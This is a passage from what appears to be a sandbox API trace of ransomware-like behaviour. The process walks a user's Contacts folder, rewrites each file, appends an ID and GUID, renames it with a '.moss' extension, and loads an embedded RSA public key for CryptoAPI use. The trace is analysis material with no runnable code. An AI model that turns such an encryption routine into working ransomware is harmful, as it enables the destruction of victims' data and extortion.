Flags=0x0, Size=0xc) returned 0x35fbb70 [0168.895] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc30 [0168.895] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0168.895] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0xd23a00 [0168.895] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xd23a00, Size=0x218) returned 0x3b48820 [0168.895] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a40 [0168.895] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc18 | out: hHeap=0xcd0000) returned 1 [0168.895] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc30 | out: hHeap=0xcd0000) returned 1 [0168.895] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0168.895] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0168.896] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48a40 | out: hHeap=0xcd0000) returned 1 [0168.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0168.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd310 [0168.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc30 [0168.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0168.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fbc18 [0168.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd320 [0168.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0168.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0168.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0168.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0168.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0168.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a70 [0168.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0168.896] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0168.896] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc30 | out: hHeap=0xcd0000) returned 1 [0168.896] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0168.896] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc18 | out: hHeap=0xcd0000) returned 1 [0168.896] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0168.896] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0168.896] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0168.896] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0168.896] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613670 | out: hHeap=0xcd0000) returned 1 [0168.896] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0168.896] GetCurrentThreadId () returned 0x324 [0168.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0168.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0xd315e0 [0168.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0168.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0168.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0168.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0168.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0168.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0168.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.896] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.896] GetCurrentThreadId () returned 0x324 [0168.896] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.896] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0168.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.897] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.897] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.897] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0168.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0168.897] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0168.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cc38 [0168.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0168.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0168.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0168.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0168.897] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0168.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0168.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0168.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0168.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0168.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0168.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0168.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0168.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc18 [0168.897] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0168.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0168.897] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0168.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0168.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0168.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0168.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0168.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc30 [0168.897] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0168.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0168.897] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0168.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbb8 [0168.897] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0168.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc90 [0168.897] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0168.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd330 [0168.898] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0168.898] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0168.898] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0168.898] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc00 [0168.898] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0168.898] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc48 [0168.898] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0168.898] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbbe8 [0168.898] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc00 | out: hHeap=0xcd0000) returned 1 [0168.898] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd300 [0168.898] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0168.898] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0168.898] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0168.898] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0168.898] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc18 | out: hHeap=0xcd0000) returned 1 [0168.898] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc18 [0168.898] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0168.898] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b48820 [0168.898] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0168.898] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0168.898] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0168.898] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b48a30 [0168.898] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0168.898] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0xdc53e8 [0168.898] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0168.898] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0168.898] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc18 | out: hHeap=0xcd0000) returned 1 [0168.898] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b48c48 [0168.898] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0168.898] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd3e658 [0168.898] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f0b8 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd3e658 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48a30 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48c48 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc48 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc30 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbb8 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbba0 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44f60 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44c48 | out: hHeap=0xcd0000) returned 1 [0168.899] WriteFile (in: hFile=0x664, lpBuffer=0x3b447b0*, nNumberOfBytesToWrite=0x48e, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b447b0*, lpNumberOfBytesWritten=0x401fb14*=0x48e, lpOverlapped=0x0) returned 1 [0168.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0168.899] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x493, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.900] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0168.900] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0168.900] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ad0 [0168.900] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b447b0 [0168.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b447b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0168.900] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48820 [0168.900] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0168.900] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71ad0 | out: hHeap=0xcd0000) returned 1 [0168.900] WriteFile (in: hFile=0x664, lpBuffer=0x3b48820*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48820*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0168.900] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0168.900] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0168.900] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0168.900] CloseHandle (hObject=0x664) returned 1 [0168.901] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0168.901] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x890) returned 0x3b48820 [0168.901] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f0b8 | out: hHeap=0xcd0000) returned 1 [0168.901] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.moss")) returned 1 [0168.902] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0168.902] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0168.902] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0168.903] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f030 | out: hHeap=0xcd0000) returned 1 [0168.903] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0168.904] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0168.904] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0168.904] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0168.904] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned=".contact" [0168.904] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0168.912] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=1177) returned 1 [0168.912] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0168.915] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x473, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.915] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0168.919] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0168.919] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0168.919] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.919] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x499, lpOverlapped=0x0) returned 1 [0168.919] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0168.919] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0168.919] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0168.920] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0168.920] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f0b8) returned 1 [0168.921] CryptCreateHash (in: hProv=0xd2f0b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0168.921] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0168.921] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0168.921] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0168.921] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0168.921] GetLastError () returned 0x0 [0168.921] SetLastError 